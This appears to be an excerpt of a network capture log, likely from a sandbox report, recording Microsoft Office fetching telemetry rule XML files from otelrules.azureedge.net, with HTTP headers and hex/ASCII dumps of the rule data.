2024-11-15 13:10:14 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49850	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:14 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:14 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:14 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 55235507-801e-0015-17af-36f97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131014Z-1866b5c5fbbzzh8chC1DFWdrc400000000xg00000000cg84 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:14 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49851	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:14 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:14 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:14 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 22c073a7-501e-0016-2540-36181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131014Z-1866b5c5fbbtpjhjhC1DFWr6tw00000001ag0000000025xh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:14 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:14 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:14 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:14 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 0f1e6da1-801e-007b-6baf-36e7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131014Z-16547b76f7fbkfmzhC1DFWm9tw00000000z0000000008fr8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:14 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:14 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:15 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:14 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 3caab57d-601e-005c-6cd2-2cf06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131014Z-16547b76f7fljddfhC1DFWeqbs000000022000000000g34w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:15 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:15 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:15 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:15 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 49ec1b51-d01e-00ad-4caf-36e942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131015Z-16547b76f7f8dwtrhC1DFWd1zn0000000n8g00000000a4eb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:15 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:15 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:15 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:15 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131015Z-16547b76f7fknvdnhC1DFWxnys0000000n6g000000009mqv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:15 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49856	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:15 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:15 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:15 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: c22da945-001e-00ad-15a1-36554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131015Z-16547b76f7fbkfmzhC1DFWm9tw00000000yg000000009z97 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:15 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49857	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:15 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:15 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:15 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 9c6f226a-f01e-003f-6009-37d19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131015Z-16547b76f7fnlq8chC1DFWxnen000000010000000000acmz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:15 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:15 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:15 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:15 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: b0821c67-a01e-0050-16a0-34db6e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131015Z-164f84587bf6n6jwhC1DFW90fn00000000m0000000003r1g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:15 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49859	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:15 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:16 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:15 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 76271b94-301e-003f-3d00-36266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131015Z-1866b5c5fbbvqncjhC1DFW0gcw00000001b0000000009uv7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:16 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49860	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:15 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:16 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:15 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 93dd010c-d01e-0014-6aab-36ed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131015Z-16547b76f7fkj7j4hC1DFW0a9g0000000n4000000000ada5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:16 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49861	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
